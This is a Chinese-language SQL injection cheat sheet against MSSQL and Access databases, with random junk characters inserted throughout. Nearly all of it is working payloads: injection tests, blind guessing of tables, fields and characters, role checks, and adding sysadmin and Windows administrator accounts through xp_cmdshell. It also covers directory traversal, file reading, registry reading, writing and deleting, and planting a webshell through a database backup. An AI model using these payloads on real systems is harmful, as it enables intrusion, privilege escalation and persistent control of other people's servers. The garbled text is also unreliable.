1.判断是否有注入;and 1=1 ;and 1=2 y~ZYI]`
J
2.初步判断是否是mssql ;and user>0 -%g&O-i\
S~+er{,ht4
3.注入参数是字符'and [查询条件] and ''=' |_ u
BA
9c-Ay
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ?-HLP%C('
$QB~ x{v@n
5.判断数据库系统
`[=3_
+YA,HhX9
;and (select count(*) from sysobjects)>0 mssql zP(UaSXz/
d2!A32m
;and (select count(*) from msysobjects)>0 access v.~uJ.T
j$u=7Z&E
[G=+f6 a
^jiYcg@_[
6.猜数据库 ;and (select Count(*) from [数据库名])>0 <8[y2|UBt
$ZEwz;HNo
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 rCTH 5"
l)^sE)
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 6|O2i j-J
U/|;u;H=
9.(1)猜字段的ascii值(access) i4XE26B;e
4EZl
(v"f`
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 %9qG|A,cA
},;ymk|g[
(2)猜字段的ascii值(mssql) J_H=GHMp}
e~+VN4D&b>
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
8FmRD
AzmISm
10.测试权限结构(mssql) 9:\YEs"
PU\?eA
:qQpBr$
hj_%'kk-A
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- y`n'>F11
x2M'!VK>n1
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- d;-/F b{4
7 z#Xf
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ofu
{g
n:#gKR-J
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Q#2gjR r
;<9 dND
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ~}g"Fe
hA0g'X2eC
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- g+xA0qW
"")I1iO
g
;and 1=(select IS_MEMBER('db_owner'));-- bhq s%B!:
"{&?t}rj+
j=C o
NdlJdq
11.添加mssql和系统的帐户 F*bmV>Qq
s?JNc4q
;exec master.dbo.sp_addlogin username;-- n.a55uy
;exec master.dbo.sp_password null,username,password;-- jQgy=;?Lwm
iO 9fg
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- fF"\$Ny
<A_L Zi
;exec master.dbo.xp_cmdshell 'net user username password $<~o,e-4
oOU?6nq
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- fF\s5f#:
)U~,q>H+
%
;exec master.dbo.xp_cmdshell 'net user username password /add';-- %~`y82r6
>C1**GQ
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- zh<[/'l
eVVm"96Q.;
xXJl Qbs
PZDj)x_%B&
12.(1)遍历目录 *&m{)cTs
'|9fDzW"]
;create table dirs(paths varchar(100), id int) rerl-T<3
(q@DBb4
;insert dirs exec master.dbo.xp_dirtree 'c:\' )G
a%Eg9
_Kw<4$0<p
;and (select top 1 paths from dirs)>0 B}(+\Q$I
[YsN c
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 2[ #7YWs
(eOzntp8
,Qd;t
2GHmA_7P
(2)遍历目录 '}Tf9L%
POl[]ni=>
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- $Eo)i
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 !D_Qat
C|@6rr9TA
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 "8'aZ.P
|BO!q9633V
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构 ]4$t'wI.
905%5\Y
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 R43yr+p
K_fQFuj+
#K5)Rb-H
}=+J&cR
13.mssql中的存储过程 ?3x7_=4t@
"-pQL )f
xp_regenumvalues 注册表根键, 子键 }AZ0BI,TI
aMxg6\8
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Q1?0R<jOU
k4:e0Wd
xp_regread 根键,子键,键值名 zB8 @Wl
h7}D//~p
;exec xp_regread aBH!K
x/UmpJD+
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键的值 ?D6?W6@
c%5G3j
xp_regwrite 根键,子键, 值名, 值类型, 值 &Ow[
.??[qBOTE
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 KKPQ[3g
Y6>@zznk
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 #LGAvFA*_F
fO;#;p.
xp_regdeletevalue 根键,子键,值名 q13bV
fG+/p 0sJ?
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 |Sne\N>%
-*Voui
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 SnK#YQCDt
C6$F.v
aCq ) hR
vy
<(1\
14.mssql的backup创建webshell <3[,bTIk
i#uc
use model ?!h
jI;_&
aSKLSl't`
create table cmd(str image); s$V'|Pt
}67lL~L
insert into cmd(str) values (''); 0 e}N{,&Y
l(o#N'!j4
backup database model to disk='c:\l.asp'; 7)2Co[t
_I"T(2Au
n#{z"G
Qx
B0I/
{
15.mssql内置函数 |wnXBKV(
xJQ-k/`
;and (select @@version)>0 获得Windows的版本号 &2~c,] 9C
5#DtaVz
;and user_name()='dbo' 判断当前系统的连接用户是不是sa w?r
D4@'C4kL
;and (select user_name())>0 爆当前系统的连接用户 &!@7+'])
J6WyFtlyLc
;and (select db_name())>0 得到当前连接的数据库 ^7qqO%
cZd9A(1"^
@w8MOT$
)L)jvCw,e
16.简洁的webshell W^es"\
5uVSbo.
use model 7K 8tz}
"sM
3NY
create table cmd(str image); *J ]2"~_.
Ju0W
insert into cmd(str) values (''); F8c^M</
=B+^-2G8
backup database model to disk='g:\wwwtest\l.asp';